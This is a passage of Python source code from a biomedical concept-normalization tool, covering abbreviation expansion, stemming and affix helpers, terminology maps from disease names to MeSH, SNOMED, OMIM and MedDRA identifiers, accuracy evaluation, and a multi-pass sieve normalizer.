abbreviationObject.getTextAbbreviationExpansionMap()\n stringTokens = re.split(r\"\\s\", string)\n\n if len(stringTokens) == 1 and len(stringTokens[0]) == 1 :\n stringTokens[0] = Abbreviation.getEntireAbbreviation(text, string, re.split(r\"\\|\", indexes))\n newString = u\"\"\n\n for stringToken in stringTokens:\n if stringToken in shortForm_longForm_map:\n newString += shortForm_longForm_map.get(stringToken)+u\" \"\n continue\n candidateExpansionsList = 
Abbreviation.wikiAbbreviationExpansionListMap.get(stringToken) if stringToken in Abbreviation.wikiAbbreviationExpansionListMap else None\n\n if candidateExpansionsList == None:\n newString += stringToken + u\" \"\n else :\n expansion = candidateExpansionsList[0] if len(candidateExpansionsList) == 1 else Abbreviation.getBestExpansion(text, candidateExpansionsList)\n if expansion == u\"\":\n newString += stringToken + u\" \"\n else:\n newString += expansion + u\" \"\n\n if len(stringTokens) == 1 and stringTokens[0] != string:\n newString = getTrimmedExpansion(text, string, re.split(r\"\\|\", indexes), re.split(r\"/\", newString))\n\n newString = newString.strip()\n return u\"\" if newString == (string) else newString\n\n\n def setTextAbbreviationExpansionMap_(self, tokens, abbreviationLength, abbreviation, expansionIndex):\n expansion = Abbreviation.getTentativeExpansion(tokens, expansionIndex, abbreviationLength)\n expansion = Abbreviation.getExpansionByHearstAlgorithm(abbreviation, expansion).lower().strip()\n if expansion != u\"\":\n self.textAbbreviationExpansionMap[abbreviation] = expansion\n\n\n def setTextAbbreviationExpansionMap (self, text):\n lines = re.split(r\"\\n+\", text)\n for line in lines:\n line = line.strip()\n tokens = re.split(r\"\\s+\", line)\n size = len(tokens)\n for i in range(size):\n expansionIndex = -1\n\n if (re.match(r\"\\(\\w+(\\-\\w+)?\\)(,|\\.)?\", tokens[i])) or (re.match(r\"\\([A-Z]+(;|,|\\.)\", tokens[i])):\n expansionIndex = i - 1\n elif re.match(r\"[A-Z]+\\)\", tokens[i]):\n expansionIndex = Util.firstIndexOf(tokens, i, r\"\\(\")\n\n if expansionIndex == -1:\n continue\n\n abbreviation = tokens[i].replace(u\"(\", u\"\").replace(u\")\", u\"\").lower()\n reversedAbbreviation = Ling.reverse(abbreviation)\n\n if abbreviation[len(abbreviation) - 1] == u',' or abbreviation[len(abbreviation) - 1] == u'.' 
or abbreviation[len(abbreviation) - 1] == u';':\n abbreviation = abbreviation[0: len(abbreviation) - 1]\n\n if (abbreviation in self.textAbbreviationExpansionMap) or (reversedAbbreviation in self.textAbbreviationExpansionMap):\n continue\n\n abbreviationLength = len(abbreviation)\n self.setTextAbbreviationExpansionMap_(tokens, abbreviationLength, abbreviation, expansionIndex)\n if abbreviation not in self.textAbbreviationExpansionMap:\n self.setTextAbbreviationExpansionMap_(tokens, abbreviationLength, reversedAbbreviation, expansionIndex)\n\n def getTextAbbreviationExpansionMap(self):\n return self.textAbbreviationExpansionMap\n\nclass Ling:\n stopwords = set()\n digitToWordMap = dict()\n wordToDigitMap = dict()\n suffixMap = dict()\n prefixMap = dict()\n affixMap = dict()\n logging.info(\"JVM class path {}\".format(os.path.abspath(\".\")))\n startJVM(getDefaultJVMPath(), \"-ea\", \"-Dfile.encoding=UTF-8\", \"-Djava.class.path={}\".format(os.path.abspath(\".\")))\n PorterStemmer = JClass(\"PorterStemmer\")\n AFFIX = u\"ganglioma|cancer\"\n PLURAL_DISORDER_SYNONYMS = [u\"diseases\", u\"disorders\", u\"conditions\", u\"syndromes\", u\"symptoms\",\n u\"abnormalities\", u\"events\", u\"episodes\", u\"issues\", u\"impairments\"]\n PREPOSITIONS = [u\"in\", u\"with\", u\"on\", u\"of\"]\n SINGULAR_DISORDER_SYNONYMS = [u\"disease\", u\"disorder\", u\"condition\", u\"syndrome\", u\"symptom\",\n u\"abnormality\", u\"NOS\", u\"event\", u\"episode\", u\"issue\", u\"impairment\"]\n\n def __init__(self):\n pass\n\n @classmethod\n def setStopwordsList(self, file_path):\n with codecs.open(file_path, 'r', 'UTF-8') as fp:\n for line in fp:\n line = line.strip()\n if line == u'':\n continue\n Ling.stopwords.add(line)\n\n @classmethod\n def getStopwordsList(self):\n return Ling.stopwords\n\n @classmethod\n def clearStopwordsList(self):\n Ling.stopwords.clear()\n\n @classmethod\n def setDigitToWordformMapAndReverse(self, file_path):\n with codecs.open(file_path, 'r', 'UTF-8') as fp:\n for line in fp:\n line = line.strip()\n tokens = re.split(r\"\\|\\|\", line)\n Ling.digitToWordMap = Util.setMap(Ling.digitToWordMap, tokens[0], tokens[1]);\n Ling.wordToDigitMap[tokens[1]]=tokens[0]\n\n @classmethod\n def clearDigitToWordformMapAndReverse(self):\n Ling.digitToWordMap.clear()\n Ling.wordToDigitMap.clear()\n\n @classmethod\n def setSuffixMap(self, file_path):\n with codecs.open(file_path, 'r', 'UTF-8') as fp:\n for line in fp:\n line = line.strip()\n tokens = re.split(r\"\\|\\|\", line)\n if len(tokens) == 1:\n values = Ling.suffixMap.get(tokens[0])\n if values == None:\n values = list()\n Ling.suffixMap[tokens[0]]=values\n else:\n Ling.suffixMap = Util.setMap(Ling.suffixMap, tokens[0], tokens[1])\n\n @classmethod\n def clearSuffixMap(self):\n Ling.suffixMap.clear()\n\n @classmethod\n def setPrefixMap(self, file_path):\n with codecs.open(file_path, 'r', 'UTF-8') as fp:\n for line in fp:\n line = line.strip()\n tokens = re.split(r\"\\|\\|\", line)\n value = u\"\" if len(tokens) == 1 else tokens[1]\n Ling.prefixMap[tokens[0]] = value\n\n @classmethod\n def clearPrefixMap(self):\n Ling.prefixMap.clear()\n\n @classmethod\n def setAffixMap(self, file_path):\n with codecs.open(file_path, 'r', 'UTF-8') as fp:\n for line in fp:\n line = line.strip()\n tokens = re.split(r\"\\|\\|\", line)\n value = u\"\" if len(tokens) == 1 else tokens[1]\n Ling.affixMap[tokens[0]] = value\n\n @classmethod\n def clearAffixMap(self):\n Ling.affixMap.clear()\n\n @classmethod\n def getStemmedPhrase(self, string):\n\n stemmed_name = u\"\"\n 
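Putting the pieces above together, setTextAbbreviationExpansionMap detects a parenthesized short form and recovers its long form from the preceding tokens; a usage sketch (the sentence is illustrative, and it assumes the stray line-separator character that crept into getTentativeExpansion above is removed):

    abbr = Abbreviation()
    abbr.setTextAbbreviationExpansionMap(u"Patients with congestive heart failure (CHF) were enrolled.")
    print(abbr.getTextAbbreviationExpansionMap())  # {u'chf': u'congestive heart failure'}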
str_tokens = re.split(r\"\\s+\", string)\n for token in str_tokens:\n if token in Ling.stopwords:\n stemmed_name += token + u\" \"\n continue\n\n stemmed_token = Ling.PorterStemmer.get_stem(token).strip()\n if stemmed_token == u\"\":\n stemmed_token = token\n stemmed_name += stemmed_token + u\" \"\n\n stemmed_name = stemmed_name.strip()\n\n\n return stemmed_name\n\n @classmethod\n def reverse(self, string):\n reversedString = u\"\"\n size = len(string)-1\n for i in range(size, -1, -1):\n reversedString += string[i]\n\n return reversedString\n\n @classmethod\n def getContentWordsList(self, words):\n contentWordsList = list()\n for word in words:\n if word in Ling.stopwords:\n continue\n contentWordsList = Util.setList(contentWordsList, word)\n\n return contentWordsList\n\n\n\n @classmethod\n def getStringPreposition(self, string):\n for preposition in Ling.PREPOSITIONS:\n if string.find(u\" \"+preposition+u\" \") != -1:\n return preposition\n\n return u\"\"\n\n @classmethod\n def getSubstring(self, tokens, begin, end):\n substring = u\"\"\n i = begin\n while i < end:\n substring += tokens[i]+u\" \"\n i += 1\n\n substring = substring.strip()\n return substring\n\n @classmethod\n def getDigitToWordMap(self):\n\n return Ling.digitToWordMap\n\n @classmethod\n def getWordToDigitMap(self):\n return Ling.wordToDigitMap\n\n @classmethod\n def getSuffix_(self, str, len_):\n if len(str) < len_:\n return u\"\"\n\n return str[len(str) - len_]\n\n @classmethod\n def getSuffix(self, str):\n if Ling.getSuffix_(str, 10) in Ling.suffixMap:\n return Ling.getSuffix_(str, 10)\n else:\n if Ling.getSuffix_(str, 7) in Ling.suffixMap:\n return Ling.getSuffix_(str, 7)\n else:\n if Ling.getSuffix_(str, 6) in Ling.suffixMap:\n return Ling.getSuffix_(str, 6)\n else:\n if Ling.getSuffix_(str, 5) in Ling.suffixMap:\n return Ling.getSuffix_(str, 5)\n else:\n if Ling.getSuffix_(str, 4) in Ling.suffixMap:\n return Ling.getSuffix_(str, 4)\n else:\n if Ling.getSuffix_(str, 3) in Ling.suffixMap:\n return Ling.getSuffix_(str, 3)\n else:\n if Ling.getSuffix_(str, 2) in Ling.suffixMap:\n return Ling.getSuffix_(str, 2)\n else:\n return u\"\"\n\n @classmethod\n def getSuffixMap(self):\n\n return Ling.suffixMap\n\n\n @classmethod\n def getPrefix_(self, str, len_):\n if len(str) < len_:\n return u\"\"\n\n return str[0 : len_]\n\n @classmethod\n def getPrefix(self, str):\n if Ling.getPrefix_(str, 5) in Ling.prefixMap:\n return Ling.getPrefix_(str, 5)\n else:\n if Ling.getPrefix_(str, 4) in Ling.prefixMap:\n return Ling.getPrefix_(str, 4)\n else:\n if Ling.getPrefix_(str, 3) in Ling.prefixMap:\n return Ling.getPrefix_(str, 3)\n else:\n return u\"\"\n\n @classmethod\n def getPrefixMap(self):\n return Ling.prefixMap\n\n @classmethod\n def getAffixMap(self):\n return Ling.affixMap\n\n\n @classmethod\n def getMatchingTokensCount(self, phrase1, phrase2):\n tokens = re.split(r\"\\s+\", phrase1)\n\n temp = list()\n temp1 = re.split(r\"\\s+\", phrase2)\n for t in tokens:\n if t in temp1:\n temp.append(t)\n tokens = temp\n\n temp = list()\n for t in tokens:\n if t in Ling.stopwords:\n continue\n temp.append(t)\n tokens = temp\n\n return 0 if len(tokens) == 0 else len(tokens)\n\n\n\n\n\n\n\nclass Terminology:\n\n def __init__(self):\n self.cuiAlternateCuiMap = dict()\n self.nameToCuiListMap = dict()\n self.cuiToNameListMap = dict()\n self.stemmedNameToCuiListMap = dict()\n self.cuiToStemmedNameListMap = dict()\n self.tokenToNameListMap = dict()\n self.compoundNameToCuiListMap = dict()\n self.simpleNameToCuiListMap = dict()\n\n def 
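Note that getSuffix_ above returns str[len(str) - len_], a single character, where the slice str[len(str) - len_:] was almost certainly intended, so the lookups in getSuffix can only ever hit one-character keys. A corrected loop equivalent of the length-10/7/6/5/4/3/2 ladder (a sketch over the maps defined above):

    def get_suffix(token):
        # Same candidate lengths as the if/else ladder, longest first.
        for n in (10, 7, 6, 5, 4, 3, 2):
            if len(token) >= n and token[len(token) - n:] in Ling.suffixMap:
                return token[len(token) - n:]
        return u""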
getTokenToNameListMap(self):\n return self.tokenToNameListMap\n\n def getSimpleNameToCuiListMap(self):\n return self.simpleNameToCuiListMap\n\n def getCuiToNameListMap(self):\n return self.cuiToNameListMap\n\n def getCompoundNameToCuiListMap(self):\n return self.compoundNameToCuiListMap\n\n\n def getStemmedNameToCuiListMap(self):\n return self.stemmedNameToCuiListMap\n\n def getNameToCuiListMap(self):\n\n return self.nameToCuiListMap\n\n\n def getCuiAlternateCuiMap(self):\n return self.cuiAlternateCuiMap\n\n\n def loadMaps(self, conceptName, cui):\n self.nameToCuiListMap = Util.setMap(self.nameToCuiListMap, conceptName, cui)\n self.cuiToNameListMap = Util.setMap(self.cuiToNameListMap, cui, conceptName)\n\n stemmedConceptName = Ling.getStemmedPhrase(conceptName)\n self.stemmedNameToCuiListMap = Util.setMap(self.stemmedNameToCuiListMap, stemmedConceptName, cui)\n self.cuiToStemmedNameListMap = Util.setMap(self.cuiToStemmedNameListMap, cui, stemmedConceptName)\n\n conceptNameTokens = re.split(r\"\\s+\", conceptName)\n for conceptNameToken in conceptNameTokens:\n if conceptNameToken in Ling.getStopwordsList():\n continue\n\n self.tokenToNameListMap = Util.setMap(self.tokenToNameListMap, conceptNameToken, conceptName);\n\n\n\n def loadTerminology(self, dictionary, isMeddra_dict):\n\n # with codecs.open(path, 'r', 'UTF-8') as fp:\n # for line in fp:\n # line = line.strip()\n # if line == u'':\n # continue\n # token = re.split(r\"\\|\\|\", line)\n # cui = token[0]\n #\n # conceptNames = token[1].lower()\n #\n # self.loadMaps(conceptNames, cui)\n\n if isMeddra_dict:\n for cui, conceptNames in dictionary.items():\n self.loadMaps(conceptNames.lower(), cui)\n\n else:\n for cui, concept in dictionary.items():\n\n for concept_name in concept.names:\n\n self.loadMaps(concept_name.lower(), cui)\n\n\n def clearTerminology(self):\n self.cuiAlternateCuiMap.clear()\n self.nameToCuiListMap.clear()\n self.cuiToNameListMap.clear()\n self.stemmedNameToCuiListMap.clear()\n self.cuiToStemmedNameListMap.clear()\n self.tokenToNameListMap.clear()\n self.compoundNameToCuiListMap.clear()\n self.simpleNameToCuiListMap.clear()\n\n def loadTrainingDataTerminology(self, documents, dictionary_reverse, isMeddra_dict):\n\n for document in documents:\n\n for mention in document.entities:\n\n conceptName = mention.name.lower().strip()\n for idx, norm_id in enumerate(mention.norm_ids):\n\n if isMeddra_dict:\n self.loadMaps(conceptName, norm_id)\n cui = norm_id\n\n simpleConceptNames = SimpleNameSieve.getTerminologySimpleNames(re.split(r\"\\s+\", conceptName))\n for simpleConceptName in simpleConceptNames:\n self.simpleNameToCuiListMap = Util.setMap(self.simpleNameToCuiListMap, simpleConceptName,\n cui)\n else:\n if norm_id in dictionary_reverse:\n cui = dictionary_reverse[norm_id]\n self.loadMaps(conceptName, cui[0])\n\n simpleConceptNames = SimpleNameSieve.getTerminologySimpleNames(\n re.split(r\"\\s+\", conceptName))\n for simpleConceptName in simpleConceptNames:\n self.simpleNameToCuiListMap = Util.setMap(self.simpleNameToCuiListMap,\n simpleConceptName,\n cui[0])\n\n def loadTrainingDataTerminology_frompath(self, path, dictionary_reverse, isMeddra_dict):\n\n for input_file_name in os.listdir(path):\n if input_file_name.find(\".xml\") == -1:\n continue\n input_file_path = os.path.join(path, input_file_name)\n\n if isMeddra_dict:\n annotation_file = get_fda_file(input_file_path)\n\n for mention in annotation_file.mentions:\n conceptName = mention.name.lower().strip()\n for idx, norm_id in enumerate(mention.norm_ids):\n\n 
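A toy illustration of what loadMaps above builds (the name/CUI pair is hypothetical, and the call assumes the stopword list and the JVM-backed stemmer have already been initialized, since loadMaps stems the concept name):

    term = Terminology()
    term.loadMaps(u"heart attack", u"C0027051")
    print(term.getNameToCuiListMap()[u"heart attack"])  # [u'C0027051']
    print(term.getCuiToNameListMap()[u"C0027051"])      # [u'heart attack']
    print(u"heart" in term.getTokenToNameListMap())     # True (token index; stopwords are skipped)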
self.loadMaps(conceptName, norm_id)\n\n cui = norm_id\n\n simpleConceptNames = SimpleNameSieve.getTerminologySimpleNames(re.split(r\"\\s+\", conceptName))\n for simpleConceptName in simpleConceptNames:\n self.simpleNameToCuiListMap = Util.setMap(self.simpleNameToCuiListMap, simpleConceptName, cui)\n\n else:\n\n annotation_file = get_bioc_file(input_file_path)\n bioc_passage = annotation_file[0].passages[0]\n\n for entity in bioc_passage.annotations:\n if opt.types and (entity.infons['type'] not in opt.type_filter):\n continue\n conceptName = entity.text.lower().strip()\n if ('SNOMED code' in entity.infons and entity.infons['SNOMED code'] != 'N/A') :\n\n if entity.infons['SNOMED code'] in dictionary_reverse:\n cui = dictionary_reverse[entity.infons['SNOMED code']]\n self.loadMaps(conceptName, cui[0])\n\n simpleConceptNames = SimpleNameSieve.getTerminologySimpleNames(\n re.split(r\"\\s+\", conceptName))\n for simpleConceptName in simpleConceptNames:\n self.simpleNameToCuiListMap = Util.setMap(self.simpleNameToCuiListMap,\n simpleConceptName,\n cui[0])\n\n\n elif ('MedDRA code' in entity.infons and entity.infons['MedDRA code'] != 'N/A') :\n\n if entity.infons['MedDRA code'] in dictionary_reverse:\n cui = dictionary_reverse[entity.infons['MedDRA code']]\n self.loadMaps(conceptName, cui[0])\n\n simpleConceptNames = SimpleNameSieve.getTerminologySimpleNames(\n re.split(r\"\\s+\", conceptName))\n for simpleConceptName in simpleConceptNames:\n self.simpleNameToCuiListMap = Util.setMap(self.simpleNameToCuiListMap,\n simpleConceptName,\n cui[0])\n\n\n\n def loadTAC2017Terminology(self, path, dictionary):\n for input_file_name in os.listdir(path):\n if input_file_name.find(\".xml\") == -1:\n continue\n input_file_path = os.path.join(path, input_file_name)\n\n annotation_file = get_fda_file(input_file_path)\n\n for reaction in annotation_file.reactions:\n\n conceptName = reaction.name.lower().strip()\n\n for normalization in reaction.normalizations:\n\n if normalization.meddra_pt_id is None:\n continue\n\n if normalization.meddra_pt_id not in dictionary:\n # logging.info(normalization.meddra_pt_id)\n continue\n\n # conceptName = normalization.meddra_pt.lower().strip()\n\n self.loadMaps(conceptName, normalization.meddra_pt_id)\n\n cui = normalization.meddra_pt_id\n\n simpleConceptNames = SimpleNameSieve.getTerminologySimpleNames(re.split(r\"\\s+\", conceptName))\n for simpleConceptName in simpleConceptNames:\n self.simpleNameToCuiListMap = Util.setMap(self.simpleNameToCuiListMap, simpleConceptName, cui)\n\n @classmethod\n def getOMIMCuis(self, cuis):\n OMIMcuis = list()\n for cui in cuis:\n if cui.find(u\"OMIM\") == -1:\n continue\n cui = re.split(u\":\", cui)[1]\n OMIMcuis = Util.setList(OMIMcuis, cui)\n return OMIMcuis\n\n def setOMIM(self, cuis, MeSHorSNOMEDcuis, conceptName):\n if MeSHorSNOMEDcuis == u\"\": # 如果Mesh ID为空,则用OMIM\n cuis = cuis.replace(u\"OMIM:\", u\"\")\n self.loadMaps(conceptName, cuis)\n\n else : # 否则用OMIM为候选ID\n cuis_arr = re.split(r\"\\|\", cuis)\n for cui in cuis_arr:\n if cui.find(u\"OMIM\") == -1:\n continue\n cui = re.split(u\":\", cui)[1]\n self.cuiAlternateCuiMap = Util.setMap(self.cuiAlternateCuiMap, MeSHorSNOMEDcuis, cui)\n\nclass Concept:\n def __init__(self, indexes, name, goldMeSHorSNOMEDCui, goldOMIMCuis):\n self.indexes = indexes\n self.name = name.lower().strip()\n self.goldMeSHorSNOMEDCui = goldMeSHorSNOMEDCui\n self.goldOMIMCuis = goldOMIMCuis\n self.nameExpansion = None\n self.stemmedName = None\n self.cui = None\n self.alternateCuis = None\n 
self.normalizingSieveLevel = 0\n self.namesKnowledgeBase = list()\n self.stemmedNamesKnowledgeBase = list()\n\n def setNameExpansion(self, text, abbreviationObject):\n self.nameExpansion = Abbreviation.getAbbreviationExpansion(abbreviationObject, text, self.name, self.indexes)\n\n def setStemmedName(self):\n self.stemmedName = Ling.getStemmedPhrase(self.name)\n\n def setCui(self, cui):\n self.cui = cui\n\n def getCui(self):\n return self.cui\n\n def setAlternateCuis(self, alternateCuis):\n\n self.alternateCuis = list()\n for alternateCui in alternateCuis:\n self.alternateCuis = Util.setList(self.alternateCuis, alternateCui)\n\n def setNormalizingSieveLevel(self, sieveLevel):\n self.normalizingSieveLevel = sieveLevel\n\n def getName(self):\n\n return self.name\n\n def getNormalizingSieve(self):\n return self.normalizingSieveLevel\n\n def getGoldMeSHorSNOMEDCui(self):\n return self.goldMeSHorSNOMEDCui\n\n def getGoldOMIMCuis(self):\n return self.goldOMIMCuis\n\n def getAlternateCuis(self):\n return self.alternateCuis\n\n def getNameExpansion(self):\n return self.nameExpansion\n\n def setNamesKnowledgeBase(self, name):\n if isinstance(name, list):\n self.namesKnowledgeBase = Util.addUnique(self.namesKnowledgeBase, name)\n else:\n self.namesKnowledgeBase = Util.setList(self.namesKnowledgeBase, name)\n\n def getNamesKnowledgeBase(self):\n return self.namesKnowledgeBase\n\n\n def getStemmedNamesKnowledgeBase(self):\n return self.stemmedNamesKnowledgeBase\n\n def setStemmedNamesKnowledgeBase(self, namesList):\n self.stemmedNamesKnowledgeBase = Util.addUnique(self.stemmedNamesKnowledgeBase, namesList)\n\n\nclass Evaluation:\n totalNames = 0\n tp = 0\n fp = 0\n accuracy = 0.0\n map_whichSieveFires = dict()\n\n @classmethod\n def initialize(self, data):\n\n for i in range(int(data.config['norm_rule_num'])+1):\n Evaluation.map_whichSieveFires[i] = 0\n\n\n @classmethod\n def incrementTotal(self):\n Evaluation.totalNames += 1\n\n @classmethod\n def incrementTP(self):\n Evaluation.tp += 1\n\n @classmethod\n def incrementFP(self):\n Evaluation.fp += 1\n\n\n @classmethod\n def evaluateClassification(self, concept, concepts):\n Evaluation.incrementTotal()\n if (concept.getGoldMeSHorSNOMEDCui() != u\"\" and concept.getGoldMeSHorSNOMEDCui() == concept.getCui()) \\\n or (len(concept.getGoldOMIMCuis()) != 0 and concept.getCui() in concept.getGoldOMIMCuis()):\n Evaluation.incrementTP()\n elif concept.getGoldMeSHorSNOMEDCui().find(u\"|\") != -1 and concept.getCui().find(u\"|\") != -1:\n gold = set(re.split(r\"\\|\", concept.getGoldMeSHorSNOMEDCui()))\n predicted = set(re.split(r\"\\|\", concept.getCui()))\n\n bFindPredictNotInGold = False\n for p in predicted:\n if p not in gold:\n bFindPredictNotInGold = True\n break\n if bFindPredictNotInGold:\n Evaluation.incrementFP()\n else:\n Evaluation.incrementTP()\n\n minus_set = gold - predicted\n if len(minus_set) == 0:\n Evaluation.incrementTP()\n else :\n Evaluation.incrementFP()\n\n elif concept.getAlternateCuis() is not None and len(concept.getAlternateCuis()) != 0 :\n if concept.getGoldMeSHorSNOMEDCui() != u\"\" and concept.getGoldMeSHorSNOMEDCui() in concept.getAlternateCuis() :\n Evaluation.incrementTP()\n concept.setCui(concept.getGoldMeSHorSNOMEDCui())\n\n elif len(concept.getGoldOMIMCuis()) != 0 and Util.containsAny(concept.getAlternateCuis(), concept.getGoldOMIMCuis()) :\n Evaluation.incrementTP();\n if len(concept.getGoldOMIMCuis()) == 1:\n concept.setCui(concept.getGoldOMIMCuis()[0])\n\n else :\n Evaluation.incrementFP()\n else :\n 
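A caution on evaluateClassification above: in the multi-CUI branch (both gold and predicted contain u"|") the counters are incremented twice per concept, once for the predicted-not-in-gold test and once for the gold-minus-predicted test, while incrementTotal ran only once, so accuracy can be skewed. If a single set-equality verdict is what is intended, a sketch:

    gold = set(re.split(r"\|", concept.getGoldMeSHorSNOMEDCui()))
    predicted = set(re.split(r"\|", concept.getCui()))
    if predicted == gold:                          # exactly one verdict per concept
        Evaluation.incrementTP()
    else:
        Evaluation.incrementFP()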
Evaluation.incrementFP()\n\n count = Evaluation.map_whichSieveFires.get(concept.normalizingSieveLevel)\n count += 1\n Evaluation.map_whichSieveFires[concept.normalizingSieveLevel] = count\n\n @classmethod\n def computeAccuracy(self):\n\n Evaluation.accuracy = Evaluation.tp * 1.0 / Evaluation.totalNames\n\n @classmethod\n def printResults(self):\n\n print(\"*********************\")\n print(\"Total Names: {}\".format(Evaluation.totalNames))\n print(\"True Normalizations: {}\".format(Evaluation.tp))\n print(\"False Normalizations: {}\".format(Evaluation.fp))\n print(\"Accuracy: {}\".format(Evaluation.accuracy))\n print(\"*********************\")\n\n for sieve_level in Evaluation.map_whichSieveFires:\n if sieve_level == 0:\n print(\"{} unmapped names, accounting for {:.2f}%\".format(Evaluation.map_whichSieveFires[sieve_level],\n Evaluation.map_whichSieveFires[sieve_level]*100.0/Evaluation.totalNames))\n else:\n print(\"Sieve {} fires {} times, accounting for {:.2f}%\".format(sieve_level, Evaluation.map_whichSieveFires[sieve_level],\n Evaluation.map_whichSieveFires[sieve_level]*100.0/Evaluation.totalNames))\n\n print(\"*********************\")\n\n\n\n\n\nclass MultiPassSieveNormalizer:\n maxSieveLevel = 0\n\n def __init__(self):\n pass\n\n @classmethod\n def pass_(self, concept, currentSieveLevel):\n if concept.getCui() != u\"\":\n concept.setAlternateCuis(Sieve.getAlternateCuis(concept.getCui()))\n concept.setNormalizingSieveLevel(currentSieveLevel-1)\n\n return False\n\n\n if currentSieveLevel > MultiPassSieveNormalizer.maxSieveLevel:\n return False\n\n return True\n\n @classmethod\n def applyMultiPassSieve(self, concept):\n currentSieveLevel = 1\n\n # Sieve 1\n concept.setCui(Sieve.exactMatchSieve(concept.getName()))\n currentSieveLevel += 1\n if not MultiPassSieveNormalizer.pass_(concept, currentSieveLevel):\n return\n\n # Sieve 2\n concept.setCui(Sieve.exactMatchSieve(concept.getNameExpansion()))\n currentSieveLevel += 1\n if not MultiPassSieveNormalizer.pass_(concept, currentSieveLevel):\n return\n\n # Sieve 3\n concept.setCui(PrepositionalTransformSieve.apply(concept))\n currentSieveLevel += 1\n if not MultiPassSieveNormalizer.pass_(concept, currentSieveLevel):\n return\n\n # Sieve 4\n concept.setCui(SymbolReplacementSieve.apply(concept))\n currentSieveLevel += 1\n if not MultiPassSieveNormalizer.pass_(concept, currentSieveLevel):\n return\n\n # Sieve 5\n concept.setCui(HyphenationSieve.apply(concept))\n currentSieveLevel += 1\n if not MultiPassSieveNormalizer.pass_(concept, currentSieveLevel):\n return\n\n # Sieve 6\n concept.setCui(AffixationSieve.apply(concept))\n currentSieveLevel += 1\n if not MultiPassSieveNormalizer.pass_(concept, currentSieveLevel):\n return\n\n # Sieve 7\n concept.setCui(DiseaseModifierSynonymsSieve.apply(concept))\n currentSieveLevel += 1\n if not MultiPassSieveNormalizer.pass_(concept, currentSieveLevel):\n return\n\n # Sieve 8\n concept.setCui(StemmingSieve.apply(concept))\n currentSieveLevel += 1\n if not MultiPassSieveNormalizer.pass_(concept, currentSieveLevel):\n return\n\n # Sieve 9\n concept.setCui(CompoundPhraseSieve.applyNCBI(concept.getName()))\n currentSieveLevel += 1\n if not MultiPassSieveNormalizer.pass_(concept, currentSieveLevel):\n return\n\n # Sieve 10\n concept.setCui(SimpleNameSieve.apply(concept))\n currentSieveLevel += 1\n if not MultiPassSieveNormalizer.pass_(concept, currentSieveLevel):\n return\n\n # Sieve 11\n concept.setCui(PartialMatchNCBISieve.apply(concept))\n currentSieveLevel += 1\n if not MultiPassSieveNormalizer.pass_(concept, 
currentSieveLevel):\n return\n\n\n\nclass Sieve:\n standardTerminology = Terminology()\n trainingDataTerminology = Terminology()\n tac2017Terminology = Terminology()\n use_tac2017Terminology = False\n\n @classmethod\n def setStandardTerminology(self, dictionary, isMeddra_dict):\n Sieve.standardTerminology.loadTerminology(dictionary, isMeddra_dict)\n\n @classmethod\n def clearStandardTerminology(self):\n Sieve.standardTerminology.clearTerminology()\n\n @classmethod\n def setTrainingDataTerminology(self, train_path, dictionary_reverse, isMeddra_dict):\n Sieve.trainingDataTerminology.loadTrainingDataTerminology(train_path, dictionary_reverse, isMeddra_dict)\n\n @classmethod\n def clearTrainingDataTerminology(self):\n Sieve.trainingDataTerminology.clearTerminology()\n\n @classmethod\n def setTrainingDataTerminology_frompath(self, train_path, dictionary_reverse, isMeddra_dict):\n Sieve.trainingDataTerminology.loadTrainingDataTerminology_frompath(train_path, dictionary_reverse, isMeddra_dict)\n\n @classmethod\n def setTAC2017Terminology(self, train_path, dictionary):\n Sieve.tac2017Terminology.loadTAC2017Terminology(train_path, dictionary)\n Sieve.use_tac2017Terminology = True\n\n @classmethod\n def clearTAC2017Terminology(self):\n Sieve.tac2017Terminology.clearTerminology()\n Sieve.use_tac2017Terminology = False\n\n @classmethod\n def getAlternateCuis(self, cui):\n alternateCuis = list()\n if cui in Sieve.trainingDataTerminology.getCuiAlternateCuiMap():\n alternateCuis.extend(Sieve.trainingDataTerminology.getCuiAlternateCuiMap().get(cui))\n\n if cui in Sieve.standardTerminology.getCuiAlternateCuiMap():\n alternateCuis.extend(Sieve.standardTerminology.getCuiAlternateCuiMap().get(cui))\n\n if Sieve.use_tac2017Terminology:\n if cui in Sieve.tac2017Terminology.getCuiAlternateCuiMap():\n alternateCuis.extend(Sieve.tac2017Terminology.getCuiAlternateCuiMap().get(cui))\n\n return alternateCuis\n\n @classmethod\n def getTerminologyNameCui(self, nameToCuiListMap, name):\n return nameToCuiListMap.get(name)[0] if name in nameToCuiListMap and len(nameToCuiListMap.get(name)) == 1 else u\"\"\n\n\n @classmethod\n def exactMatchSieve(self, name):\n cui = u\"\"\n # check against names in the training data\n cui = Sieve.getTerminologyNameCui(Sieve.trainingDataTerminology.getNameToCuiListMap(), name)\n if cui != u\"\":\n return cui\n\n # check against names in the dictionary\n cui = Sieve.getTerminologyNameCui(Sieve.standardTerminology.getNameToCuiListMap(), name)\n if cui != u\"\":\n return cui\n\n if Sieve.use_tac2017Terminology:\n cui = Sieve.getTerminologyNameCui(Sieve.tac2017Terminology.getNameToCuiListMap(), name)\n if cui != u\"\":\n return cui\n\n return cui\n\n\n @classmethod\n def getTrainingDataTerminology(self):\n return Sieve.trainingDataTerminology\n\n @classmethod\n def getTAC2017Terminology(self):\n return Sieve.tac2017Terminology\n\n @classmethod\n def normalize(self, namesKnowledgeBase):\n for name in namesKnowledgeBase :\n cui = Sieve.exactMatchSieve(name)\n if cui != u\"\":\n return cui\n\n return u\"\"\n\n @classmethod\n def getStandardTerminology(self):\n return Sieve.standardTerminology\n\n\nclass PrepositionalTransformSieve(Sieve):\n\n @classmethod\n def apply(self, concept):\n PrepositionalTransformSieve.init(concept)\n PrepositionalTransformSieve.transformName(concept)\n return Sieve.normalize(concept.getNamesKnowledgeBase())\n\n @classmethod\n def init(self, concept):\n concept.setNamesKnowledgeBase(concept.getName())\n if concept.getNameExpansion() != u\"\":\n 
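The eleven unrolled blocks in applyMultiPassSieve above all follow one pattern: run a sieve, stop if it produced a CUI or the configured maximum level is reached. An equivalent data-driven sketch using the classes defined in this file:

    SIEVES = [
        lambda c: Sieve.exactMatchSieve(c.getName()),           # 1
        lambda c: Sieve.exactMatchSieve(c.getNameExpansion()),  # 2
        PrepositionalTransformSieve.apply,                      # 3
        SymbolReplacementSieve.apply,                           # 4
        HyphenationSieve.apply,                                 # 5
        AffixationSieve.apply,                                  # 6
        DiseaseModifierSynonymsSieve.apply,                     # 7
        StemmingSieve.apply,                                    # 8
        lambda c: CompoundPhraseSieve.applyNCBI(c.getName()),   # 9
        SimpleNameSieve.apply,                                  # 10
        PartialMatchNCBISieve.apply,                            # 11
    ]

    def apply_multi_pass(concept):
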